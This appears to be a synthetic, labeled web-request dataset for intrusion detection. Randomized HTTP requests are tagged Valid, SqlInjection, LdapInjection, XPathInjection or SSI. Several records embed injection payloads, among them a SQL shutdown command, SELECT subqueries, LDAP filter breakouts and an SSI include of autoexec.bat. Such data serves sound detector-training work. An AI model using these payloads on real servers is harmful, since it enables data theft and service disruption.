From: afrre@eioecipcc.biz
If-Modified-Since: Sun, 25 Jan 04 14:23:20 UTC
If-Unmodified-Since: Fri, 30 Jul 04 13:49:14 CET
If-Match: "0yMHa5YYPD43Dam34c"
If-None-Match: *
If-Range: Fri, 09 Sep 05 14:30:40 CET
Max-Forwards: 1013
MIME-Version: 1.8
Pragma: sedls=eioa
Proxy-Authorization: NTLM MmJ1c2VQc29jYTQzQmFtTW1mQTNwc2l0bmF0bnRta2V1ZVJuZFN6ZWl3Zmhi
Authorization: Digest realm
Range: 0284-605
Referer: /2hRr/LEenrh/5YRnai/astitmoy.jpg
TE: deflate;q=0.5,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/4.7 (Machintosh; U; PPC Mac OS X 6.6; aw-de; rv:7.2.7) Gecko/56029006
UA-CPU: PowerPC
UA-Disp: 9422,2675,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 795x581
Via: s1Ehi/8.3 www.spccgiz8.html, FTP/1.4 www.mexdreh.htm:86
Transfer-Encoding: compress
Upgrade: Jva/3.2, d3wi/9.9, tra9r/7.8
Warning: 888 211.74.193.32 "DiEveosmIeusdpsPryeh" 
X-Forwarded-For: 179.151.107.237
X-Serial-Number: 534170749
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

te=670&gaTth=hl2us\xp_iiio&zQD.3zYform1Ysf=nrIuxlsmcu&aaoblri80tcdha=o0lel7axtuihl&Ha=ird+ntos &swsiuz0=iim

End - Id: 7900
Start - Id: 10845
class: Valid
GET /dvmjmletedrhune/trLuQeret/nn/trnuatnmbnElkN/hKr9dtr/teto1o8hoeo/ac.php4?r0rsrporpmoigih=t6defh&rfoirmUtadnst=1pbchir&nela=a%28telocation&siiietepucytlle=50&94tis1Ecbler=106050&stERgeaaten9arO=0dinw%24%3D9R7i%3FeSi8&inkaskn=39244&a2hdi2=ilxeudd HTTP/1.1
Host: 74.167.186.61
Connection: close
Accept: audio/*;q=0.3, text/html;q=0.6
Accept-Charset: isiri-3342
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: min-fresh=63
Client-ip: 217.184.252.45
Cookie: tf1atgsO=fwbng;ftenaEcl2=293803
Cookie2: $Version="4"
Date: Sun, 18 Mar 07 04:10:09 UTC
ETag: W/"zxBQQELpFxYha59F"
Expect: sihdulZC
From: MAtn@aarleli.uk
If-Modified-Since: Wed, 07 Jan 09 10:14:45 UTC
If-Unmodified-Since: Sat, 19 Jun 04 04:43:51 UTC
If-Match: "0QwDrLs0CYOaE9M.Sq"
If-None-Match: *
If-Range: Sat, 05 Sep 09 15:48:00 GMT
Max-Forwards: 25
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="enenioLT"
Authorization: Digest opaque="wsovloy"
Range: 83652-,8-
Referer: /1hmkT/thureni.jsp
TE: trailers,deflate;q=0.1,trailers
Trailer: Trailer
User-Agent: sVqgPBo http://www.x8ha.st
UA-CPU: StrongARM
UA-Disp: 7212,6532,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 633x671
Via: edm/0.1 227.224.87.147
Transfer-Encoding: deflate
Upgrade: clli/2.2, tee/6.7, b4acRj/4.6, raese/1.9
Warning: 821 192.39.173.188:50926 "iiEwc" 
X-Forwarded-For: 96.51.246.201
X-Serial-Number: 907495686273869
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10845
Start - Id: 14035
class: Valid
GET /Tqtlfonaar/FXa/euokanudheCnnNfnu.cgi?evIinsertNIcopym5=erIentiq&hldptpnai4td4=het&oeyl3vdNb1bt=r.LN&nfhhjogoc=UehmEinU&ARPpimgtmpjqYf0=trptdc&nO4=0y1ty HTTP/1.1
Host: 45.62.201.99
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: yys-hxrypse, qienst-eTAM
Cache-Control: max-stale
Client-ip: 185.231.121.162
Cookie: 7nyskjl3N=7;t8whrtythaqri=rsThk
Cookie2: $Version="5"
Date: Thu, 15 Jan 09 15:13:05 UTC
ETag: W/"mZ7T9k.3qtOxWWdp2KS"
Expect: awtWbm=tdPh;Ao4ive
From: aeeaqe@ea10ef.st
If-Modified-Since: Tue, 24 Jul 07 08:03:51 GMT
If-Unmodified-Since: Wed, 31 Mar 04 06:52:35 CET
If-Match: *
If-None-Match: "@xjAXGNOyoNjSrU"
If-Range: Fri, 24 Jun 05 21:34:12 GMT
Max-Forwards: 0
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="nsetvaon"
Authorization: Digest realm
Range: 92-
Referer: /ufxom/ebeoaf/antN5ee/94hi0bw/onrrms.php
TE: deflate,gzip;q=0.4
Trailer: Date
User-Agent: eacenveiauAAjnrrtnn
UA-CPU: x86
UA-Disp: 7781,2537,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8443x481
Via: FTP/3.8 www.aalah6i4.html, HTTP/4.6 www.gd0o.gif
Transfer-Encoding: gzip
Upgrade: iQr/6.2
Warning: 285 12.210.81.67 "VnnPEeqt6bdltiru" 
X-Forwarded-For: 70.126.200.109
X-Serial-Number: 0043438224132828242
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14035
Start - Id: 4839
class: Valid
PUT /6V@/weo1rmhU7dhwe3u/snVA_fecA/cO50YHe/afMoerere1tnk6rp/hsoHjWlwebrQ8gL9u_B/edogwseDt/3EEaokC.htm? HTTP/1.0
Content-Length: 67
Content-Language: o9ei,o0wdlu,7imtena
Content-Encoding: compress
Content-Location: /rt9ein.cfm
Content-MD5: Y3JuY2U0cmhhTmR4bmVubA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 27 Feb 06 22:38:46 GMT
Last-Modified: Sat, 16 Apr 05 13:33:13 CET
Host: 65.114.169.23:1631
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: identity, identity, gzip, deflate, compress
Accept-Language: *
Cache-Control: max-stale
Client-ip: 155.243.198.117
Cookie: ndsnnkApansSym=enepcsElli;yrwksneiRec=62;i9oeqdC=72989047
Cookie2: $Version="96"
Date: Sun, 19 Jul 09 15:08:35 UTC
ETag: "oUWQNUB5uYNqnXOE"
Expect: 100-continue
From: leaTmHa@pheie.net
If-Modified-Since: Tue, 13 Oct 09 01:17:42 CET
If-Unmodified-Since: Sun, 02 Jan 05 10:12:08 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 22 Sep 05 20:47:19 CET
Max-Forwards: 5
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: naIcSN re1rfCoS=bpehrr
Authorization: Basic aXpldGk6Y2VzYjN0ZQ==
Range: 43-
Referer: /uaoidhpf/aecntnr/owka/che4.wav
TE: trailers,chunked;q=0.7
Trailer: Accept-Language
User-Agent: Mozilla/7.8 (X11; U; Linux i386 6.6; rt-gu; rv:5.5.1) Gecko/38232165
UA-CPU: StrongARM
UA-Disp: 092,446,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 812x666
Via: 5.8 www.sa9fihA.js
Transfer-Encoding: compress
Upgrade: 0coex/6.3, 92da/1.7, 0o7h/3.9, 0ah/4.2, etiE/1.6
Warning: 023 191.251.175.83:94352 "ra7sp6lsitbtinme" "Sat, 03 Oct 09 15:33:52 UTC"
X-Forwarded-For: 191.124.85.186
X-Serial-Number: 408211072514512
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

vhaleoeE6ooLaod=edEogoMp&eateyr=:o td u r6aaccess_log&pq=hcrOa2ds

End - Id: 4839
Start - Id: 7796
class: Valid
POST /tLKuwz@a7q61q83V@/od9aeeeORfm/raali/atsop1im3Aatitas/Tp17mibei0dabnt/qmBjKuB9sB/gAvoH/dbynea/TN9rm/3yeE1oorstgh/zJVEs/eEmv9hf.php? HTTP/1.1
Content-Length: 135
Content-Language: ew
Content-Encoding: identity
Content-Location: /cAhEEcze/ezdmnyN7/Ihirosc.tar
Content-MD5: YWx5c2V0cmFlaWxhczFCbw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 13 Aug 09 21:51:38 CET
Last-Modified: Thu, 03 Jun 04 05:05:33 GMT
Host: www.ehkxd3n.net
Connection: ioua7l0h
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: gzip, compress, identity, deflate, compress;q=0.9
Accept-Language: ARlmo-Atidi;q=0.0, rs-ed, hE8wDe-eda
Cache-Control: no-transform
Client-ip: 248.78.197.68
Cookie: EdUMsldbpw=O;GjBdQjV1toboot.iniautoexec=8@ntkba;bychbethr=7;grbnnVFDlIa17d=cvK46A9
Cookie2: $Version="5"
Date: Sat, 13 Oct 07 10:05:18 UTC
ETag: W/"HgZzVWWDRk8h5.QPt@"
Expect: 100-continue
From: msDNtTe@mtt5jy.de
If-Modified-Since: Sun, 14 Feb 10 24:45:38 CET
If-Unmodified-Since: Wed, 21 Jun 06 10:03:05 UTC
If-Match: "uypJ7OOVwGLnpFbNH"
If-None-Match: *
If-Range: *
Max-Forwards: 33
MIME-Version: 8.5
Pragma: at8mmbf='ayh'
Proxy-Authorization: NTLM aDRhYXNEZXRlZXBudUluY2Flc0FtdGVxdWlpcndzdW5zM3RUU2VlZWNoY3NnYQ==
Authorization: Basic d25zaTp4ZjJ3
Range: -43411,-175805,6-
Referer: http://www.devbhu.cz/epkruoik/ir5dss/bl7ii/sneleoLt/vp3ea.jsp
TE: trailers
Trailer: Expect
User-Agent: Mozilla/6.5 (X11; U; Linux i586 3.2; lv-iY; rv:4.6.9) Gecko/28114802
UA-CPU: StrongARM
UA-Disp: 179,7168,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 669x1617
Via: 4.8 89.72.48.85, HTTP/4.6 www.w5ta.js
Transfer-Encoding: compress
Upgrade: hZ1Tjt/9.1, t5sa/5.7, ibgt1/8.3
Warning: 240 www.9cth.tiff:70 "nahs" "Fri, 31 Aug 07 19:06:50 CET"
X-Forwarded-For: 202.225.233.245
X-Serial-Number: 27066605
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

O9KbgsoundLOstyleKIM=25303037&tt=eyreplaceh &w9zatbittataC= oEesaRnecc3rnN&sorcwrnukrtt=52armo4pigupp2dioT&emesicDninHr=2&magzYitlOr=ow

End - Id: 7796
Start - Id: 15137
class: Valid
GET /e1ngdisaslntsa1si4ct/dkM.Whsur2BgVZZN/ucv0wAGB5/ec2asz7ti/ai7nznAt/bjxbDuTIYlrR8/ezZaXjKi8Fir1ZAm3zB/ya1iriyoortnu/spmwtqerioesrshimbt/PTsoaxdrrfNf8Eys6sdc/akbr7IouJB_G5_d.php4?Dtnteeg=%3Ee0o4eo0w+lstdin&ltorANen1rcl=sock_streamujvbscripti&pahnls=93&0WbNQKp=lw4xi6liemeeeNoae HTTP/1.0
Host: www.Ioc8E.de
Connection: keep-alive
Accept: application/zip, text/*, audio/x-wav;q=0.3
Accept-Charset: iso-8859-1, iso-8859-4;q=0.5, x-mac-turkish, euc-kr
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale=7
Client-ip: 56.153.140.186
Cookie: ceFmg=eUY1sH;qkt=86wb%e
Cookie2: $Version="626"
Date: Mon, 26 Oct 09 05:35:12 UTC
ETag: "gpo4vmx3e_svOHVb"
Expect: icIaiG=peynEls
From: tcnemzxc@oisi.it
If-Modified-Since: Fri, 05 Feb 10 05:17:06 CET
If-Unmodified-Since: Sat, 01 Nov 08 12:52:07 UTC
If-Match: *
If-None-Match: "xi0C@WGAjnqvFFwLJjj"
If-Range: Mon, 27 Mar 06 24:00:10 GMT
Max-Forwards: 536
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: NTLM cjN2d0l6NmxVOHJuaWgxOWhlZWFpdmV6YTJub3JON3Q=
Authorization: Digest algorithm=wsteC
Range: 8-,8116-1
Referer: /s7oyzNmh/ryaerl/rreloT/yo73i/oadl.rar
TE: trailers,deflate;q=0.5,trailers
Trailer: User-Agent
User-Agent: Mozilla/8.4 (Windows; U; WinNT 9.8; gt-te; rv:9.2.4) Gecko/63924116
UA-CPU: 68000
UA-Disp: 316,810,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 572x437
Via: FTP/9.6 www.eetdcngi.html:17469, pdthmi/3.8 www.fnntv.js:59405
Transfer-Encoding: identity
Upgrade: 0eh/6.4, osGe/9.1, lftl/8.8
Warning: 492 198.163.135.58 "Xr8olpskba5escfetmfl" "Tue, 05 Jul 05 16:42:14 UTC"
X-Forwarded-For: 79.50.237.25
X-Serial-Number: 233434892494
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15137
Start - Id: 37782
class: LdapInjection
GET /nrdadxoeedel/axjh/AhdeletepnstdinHmD2R2f/C@zzT97htpass/3Ja/O05knweaeqtur/ho9vEnhU0lulhoinAoA0/eekcWHECuV3Q/iafnridmDdp.tiff?uetamdeeE=beireo%40&aPtUocescnfiaax=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&wnV4RG6Oehtacces=4eC&oeefinidtwoI=ab3rGxpz3wpa&e5oe=9401685571&connectu5g_or=ode%40 HTTP/1.1
Host: www.e6e5dkHqur.gov
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-ce;q=0.4, euc-jp;q=0.8, ks_c_5601-1987, macintosh;q=0.7, windows-1257
Accept-Encoding: deflate, identity, deflate, gzip;q=0.0, compress;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 233.194.90.144
Cookie: aEii=or\[tar t;ooHthnno6a=t_fsrfZSKs;wtretzt=8gntbldoeasb3;Eq01yDV=9
Cookie2: $Version="8"
Date: Mon, 17 Mar 08 07:16:43 UTC
ETag: "mDAYOsL4em92yPEE154f"
Expect: wdlwmtn=rmtd;isou5=aemieea
From: 0toi@nMoY9ioe.ch
If-Modified-Since: Tue, 06 Dec 05 23:23:38 GMT
If-Unmodified-Since: Tue, 30 Sep 08 06:09:32 CET
If-Match: "OfvDuR9paX9RqvEV7"
If-None-Match: *
If-Range: Thu, 09 Aug 07 03:01:01 GMT
Max-Forwards: 3152
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: ohdon nEbfg=9sctk
Authorization: ruOs2 s7fosnh=weuj
Range: 942-,92-,07-63
Referer: /tee0/yc6nlt.php
TE: trailers,trailers,chunked;q=0.5
Trailer: Range
User-Agent: ofsndhtttvuiAfshen
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 807x162
Via: 3.2 www.dsrs.js
Transfer-Encoding: compress
Upgrade: 1wi/0.9, ue5/8.1, uoi/7.4
Warning: 736 246.53.33.205 "ozyyvn" "Tue, 19 Feb 08 20:58:35 UTC"
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 0381591746319527137
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37782
Start - Id: 42442
class: SqlInjection
GET /3M2GAzu9bgsound/r3_/co/rl/jyrirme/ib.dll?97sB=1&ehez=6404979&t7ootGyiib=9064627&es=pty+&asu=%27select+customer_phone++%27%7C%7C%27from+customers+++++%27%7C%7C%27where++customer_surname%3D%27%27%27%7C%7C++++lv_surname%7C%7C%27%27%27+++++and+++++customer_type%3D1%27%3B&ueIdvtit=s5apjenr0dl%24r8%26id1&uttabalbttesnac=%3EFon%2Bp%29talnje+a HTTP/1.0
Host: www.hdesth.org
Connection: ieeao
Accept: image/gif;q=0.3, image/gif;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, deflate;q=0.9, deflate;q=0.9, identity, compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 138.240.240.225
Cookie: m6ooniseoa=lutdh0laeeoiMtaz;u4d=iewaza5ai7u6mu3;c0ben=swEOoygno3hlxnsS1e;srn1h0cahebramd=0MuzI;uhotpnfu=$a;zlobl=rFeeoTeXe
Cookie2: $Version="1"
Date: Mon, 27 Dec 04 20:37:09 UTC
ETag: W/"OW_oBv4XGNtza5TpHP"
Expect: 100-continue
From: hraer@erUscu.ch
If-Modified-Since: Thu, 19 May 05 10:03:16 GMT
If-Unmodified-Since: Sat, 03 Jan 09 06:43:40 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Jun 04 03:05:30 GMT
Max-Forwards: 0
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic ZXllaVRoczY6bHNvM2k=
Range: 378414-80248,967-,-2698
Referer: http://n7er2.st/heipa1tE/xnledlec/dRoo/obtoeaa2/sDjs.ace
TE: chunked
Trailer: If-Unmodified-Since
User-Agent: pOmc9iesnv (0Ji_e146Rc; lRLcm.R; 2vE239k44r; en5gc8rKen; yd9CBBSsn)
UA-CPU: 68000
UA-Disp: 807,741,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 028x6235
Via: 1.7 www.io3p.jpg, eii3c/4.3 www.edx08.png, FTP/5.8 100.160.112.158
Transfer-Encoding: compress
Upgrade: irelm/1.0, pnd/5.9, apf/2.0, tndhu/6.2
Warning: 804 3.116.103.108 "ltdxdrissdd" "Wed, 08 Nov 06 17:00:19 UTC"
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 7668740
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42442
Start - Id: 48443
class: XPathInjection
GET /vCQxOgQi66/k56earln1t/DptaaAc/8crhuE/egwFK@Y/ieUicag6ahoE/h9oAIJR.html?ejAimotannlpya=re7nioJx6a&agshutdownmOe=sAL&da16ala=mlcopyc3a9frae&kpEaIheIS=9xnQOg.la3HU&eaum=xp_h+n%3ArlnHtm5cni2%3F&HnwwgnI4mcf=fmr&_Y9r=190&xzsgrruekhto3=26573240 HTTP/1.1
Host: www.8Eptq.com
Connection: keep-alive
Accept: application/*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.6
Accept-Language: S-ne1e, gkA4kI-i;q=0.0
Cache-Control: max-stale=72
Client-ip: 149.84.157.200
Cookie: TSPMkQcw=(i  <  count(aAec/child::text())    and j     <     count(nun/child::comment())    and  k <    count(il/child::*) );8rlejTtgoc1sl=67195;Sps2t05d=6tht rla;e4ldi=g8mmetaid a(x;t$epo 
Cookie2: $Version="6"
Date: Wed, 30 Jun 04 23:33:13 GMT
ETag: W/"kUSTulY8V6NZDpPR"
Expect: aehiyth=1ref;rnpuReyt=b5ljiw
From: tzeeyyn@tbckkmdmi.st
If-Modified-Since: Tue, 12 Oct 04 23:54:36 UTC
If-Unmodified-Since: Thu, 18 Feb 10 20:44:26 GMT
If-Match: "DzPuCgfS.F8OCbP"
If-None-Match: "-6Nkwf5bLps.dFc"
If-Range: Tue, 17 Jan 06 02:52:58 CET
Max-Forwards: 6
MIME-Version: 9.5
Pragma: ss=hodcd5sz
Proxy-Authorization: Basic cm5sdDhhbmQ6THJ6Tg==
Authorization: NTLM dGFqOG5yZXRpaWtudG5lajUyZWUxaFJzdGV0ZG4waVNycmxubnJl
Range: 91336-,-23681,1-84677
Referer: /aryted/friTEqeI/temzowi/ena9pid0/sTzjp.gz
TE: trailers
Trailer: Proxy-Authorization
User-Agent: jivh/4.0.2.0
UA-Disp: 1479,1332,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 348x583
Via: 8.5 61.142.72.91:0195
Transfer-Encoding: deflate
Upgrade: dse/4.4, rhrdr/6.2, 9hnEah/8.5, sgDe/2.8, e7oi/0.2
Warning: 787 www.nspetr.htm "homtzfS" 
X-Forwarded-For: 152.33.64.46
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48443
Start - Id: 41894
class: SqlInjection
GET /fpW.Cw/3Anne/yx0.AC/pTrtt6uTpOt-_PDf9t/avK_WWh/rz8J-@uCuG2GlB5qEd.t/s2Ao83/hoyEeM-ICf_8p.6f1.msf?HqiEJlike.N=cnbj&9lfF6QU=rraor&ehlnEbde=iIpriD_&Syin8lMlre=169025&UMGEuxortaqvc=%27%3B++shutdown-- HTTP/1.1
Host: www.oascaful.cz:4
Connection: 80rrso
Accept: text/*;q=0.8, image/gif
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.4
Accept-Language: thao-npsnOa;q=0.5, ysDert7-EuAa8c;q=0.7, gdTgg-mr;q=0.4
Cache-Control: no-store
Client-ip: 143.204.36.23
Cookie: tnCbr4n7ATar= rleId;NlOhdOnp=933;e4p=4052951520
Cookie2: $Version="477"
Date: Tue, 25 Mar 08 17:21:05 CET
ETag: "ofotsShZb@38oZjIsB"
Expect: 100-continue
From: 4Nttn@NaeRods.net
If-Modified-Since: Sun, 05 Mar 06 17:18:13 CET
If-Unmodified-Since: Fri, 25 Feb 05 01:30:15 GMT
If-Match: "EUjR03G55pIl1cxiq"
If-None-Match: *
If-Range: Thu, 25 Jan 07 23:32:38 UTC
Max-Forwards: 608
MIME-Version: 7.9
Pragma: ir6n=enfy
Proxy-Authorization: NTLM ZXI5aW5vc2VsdHJadGxldmVnYXJlZWFvYXVrczYxaXhPaXRlOA==
Authorization: Basic aXptZm5ldDpxcTRudQ==
Range: 7-,552794-,881563-
Referer: /4jnhvina/g6eA/oetnsOry/nehLnor/ntnnu.php
TE: chunked,deflate
Trailer: TE
User-Agent: Mozilla/3.2 (Windows; U; Windows NT 6.8; gb-au; rv:6.1.5) Gecko/15446893
UA-CPU: PowerPC
UA-Disp: 421,960,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 6544x276
Via: 6.3 185.42.225.104
Transfer-Encoding: gzip
Upgrade: 9sH/0.7, h7C/7.3, a0w3h/0.4
Warning: 209 99.218.44.161 "n5shpLu8ptOeAstrt7u" "Mon, 11 Feb 08 12:06:51 UTC"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41894
Start - Id: 18546
class: Valid
GET /d7dCeh/BKHy2QHUzrU/exec@Q5X@IiR/XJd6N-k/rchdobeelr/sY6paDK.jsp? HTTP/1.0
Host: 127.147.123.108
Connection: close
Accept: audio/basic, text/plain;q=0.3, audio/x-wav;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: enorlb1-5g6, o-y;q=0.4, hh2k-1et;q=0.1
Cache-Control: min-fresh=2
Client-ip: 26.16.70.98
Cookie: xuwsibs8iRz2Le=0511039;OHVHB= EaeeL9;rok4aact3rgetoo=oie;fuusei7ie=nol4aatia;WhcjjtpL7g3uo=o81lfCD88
Cookie2: $Version="26"
Date: Mon, 27 Feb 06 10:39:52 GMT
ETag: W/"PttFC3n09GCd6qj"
Expect: pEbr=m5Fy;tsoAplxR=eieeotia
From: 2dHy@nMyaaotcd.gov
If-Modified-Since: Sat, 27 Jun 09 04:18:34 UTC
If-Unmodified-Since: Sun, 06 Feb 05 01:04:39 GMT
If-Match: *
If-None-Match: "6azVtGi-@0uKRW5B"
If-Range: *
Max-Forwards: 67
MIME-Version: 5.4
Pragma: sa3='no'
Proxy-Authorization: Basic ZTByZTpzYVR1aWk=
Authorization: wpqo7l neos=IeuoOezd
Range: 46-,56-
Referer: /m4shpn/o45eo.htm
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/9.6 (Windows; U; Win 9x 1.6; 8i-oo; rv:7.1.1) Gecko/89394132
UA-CPU: Sparc
UA-Disp: 973,9699,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 973x8998
Via: 7.3 www.h8acloeN.jpg
Transfer-Encoding: 4e1i; eawzey=snsq
Upgrade: eeyva/6.8
Warning: 796 112.101.223.110:07414 "asavawnk" "Fri, 13 Oct 06 24:51:15 CET"
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 40414615687
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 18546
Start - Id: 38368
class: LdapInjection
GET /sr1flm/yehYemhbiyiohdrmrl/eBkke/zqbrenoE4ced0Hu/8yshoe6woenr/rootead.png?eontnes3phnadrf=679%29%28%26%28objectClass%3DlHb%29%28%7C%28sn++++%3D++yu%29%28cn%3Dhasa+J*%29%29&tettle7geNi19=lOBxxQnHxD&eaunldrrr=149&wt=rydtisltityneq&tznZioNn3cs=nteiktte&cps=dtsisa&vnDk2=86&om0sxhnlofsr=9156&ote6wd=73716&ptuehmmmooC=ii-c&6ipebmzaaln=623204 HTTP/1.0
Host: www.8cesc.uk
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-arabic, windows-1253
Accept-Encoding: compress;q=0.8, gzip
Accept-Language: wnt-mlChddv;q=0.3, hhiauh-oeyedo;q=0.8, in8hg-aslfOr;q=0.7
Cache-Control: no-store
Client-ip: 152.74.253.224
Cookie: eystheuhi=955061;eaeinh5rk3qte=d)eaa(h;upirozlrebller=l~1 gineeallb htrflsopt&a;0sr=tBLcSI;9at=rs  rwindow.open7>-;cmdkad=veFoo
Cookie2: $Version="3"
Date: Tue, 10 Oct 06 21:09:59 CET
ETag: "XdKqihpT_MZZjEK6G"
Expect: 100-continue
From: frlm@ctsi1ez.ch
If-Modified-Since: Fri, 24 Dec 04 16:31:53 GMT
If-Unmodified-Since: Wed, 19 Dec 07 21:49:55 GMT
If-Match: "d3QqBsEjQtALlk0wU"
If-None-Match: *
If-Range: Wed, 24 Nov 04 12:17:25 CET
Max-Forwards: 548
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: agin 7Gqd=SEesnE
Authorization: Basic MWF0cmFvc2U6Y3NycHc3
Range: -0,582766-
Referer: http://www.staiaw.ch/hrjF/roOyne/eDjth/lp7n.jsp
TE: chunked
Trailer: Referer
User-Agent: deqZqnia (hf_ik4b; iXU@dHii; epqpgc_; uIVCPI)
UA-CPU: 68000
UA-Disp: 8585,869,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 231x314
Via: 6.1 www.tsBshuqe.htm:7946
Transfer-Encoding: 7Sni
Upgrade: ooh/1.6, rCeq/8.8
Warning: 242 www.rnh0htla.jpg:8 "nyednaRaaanaige" "Wed, 12 Mar 08 13:13:41 GMT"
X-Forwarded-For: 251.153.108.27
X-Serial-Number: 9579642646846
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38368
Start - Id: 42425
class: SqlInjection
GET /nvOyleeggne/t56_uHuyL_Y-/7hnt/uromveewnaerentx/aocadgslT/ltWp/CCCMHNCboot.ini/z-zTp/netcat26aSEU0/pl2jJZAHQ/vosyisudrsef6hoed.aspx?Qoptnsi=m_e%40BZ2&qstemfhetn9dTsd=%27++++%2B+++%28++++SELECT+++++TOP++++1++sl2+FROM++++eeepu%29++++%2B+++++%27&8oiiahXasspn=04428&QgLA9D0FQqL=spuec%29rnieg HTTP/1.0
Host: www.gaaiui.com
Connection: close
Accept: */*
Accept-Charset: iso-8859-15
Accept-Encoding: deflate;q=0.8, gzip, compress, identity, gzip
Accept-Language: h-std, ba-neer;q=0.3, oulh-uc
Cache-Control: avspi=upaaodfa
Client-ip: 28.141.41.185
Cookie: hl=d2wteffl;9XP@M2J@cconnectW=oiyab;areh=Eenwn2zwsnrtwhsni
Cookie2: $Version="157"
Date: Tue, 05 Aug 08 07:35:15 UTC
ETag: W/"ROs81ENXsNKrraDFF"
Expect: epanbff
From: Tm9x@je4xi.it
If-Modified-Since: Sun, 05 Jul 09 09:35:00 CET
If-Unmodified-Since: Tue, 30 Mar 04 08:10:04 GMT
If-Match: "DyIdS6qC79jRQ49jY"
If-None-Match: *
If-Range: Wed, 16 Jun 04 15:39:56 CET
Max-Forwards: 1878
MIME-Version: 0.1
Pragma: ttExI=sunRi
Proxy-Authorization: Basic aHdkZWQ6dDVtbjYzb1M=
Authorization: NTLM b2RpYWtpN2JlVWlhc2RzTjBlcjVnZWVMZDNoWW9lcEFudGgwMnRk
Range: 005696-6624,4-
Referer: /aweenhhe/ets4zuOU/ifsi/jixm7.pl
TE: trailers,chunked
Trailer: Trailer
User-Agent: tweteuslca (hgV.hCM4ZB; tEiAFdml; m@I2m5u; bGC@STzfn)
UA-CPU: 68000
UA-Disp: 4009,500,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 189x646
Via: 6.5 207.97.59.250:4611
Transfer-Encoding: compress
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 781 102.8.11.215 "Yhee38R7lileIanstkb" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 42425
Start - Id: 40496
class: SSI
GET /usr_3YN5N/ih/ueWsy6n/Uj2rfy/mnTAXBbk982z5lZ9qRBz/tPRQWzKSuBV1YFiD@/HdalGhFsxtermvP/telnettRJ0/ouhvu/tOqPeAup0zF/1Wprocessing-instruction0Y.html?euscTnio=h8sEccoc&khss6ex=%3C%21--+++++%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E&pmaDst1E=opng85+i+positiont%28t&kue2=7730&deleteKTdmehscriptN=ajIcnmoul&openwhereZZhTpv5BJ=t&s6mks=na&O@mIOVFnodeUb=06 HTTP/1.1
Host: 68.160.141.138:80
Connection: keep-alive
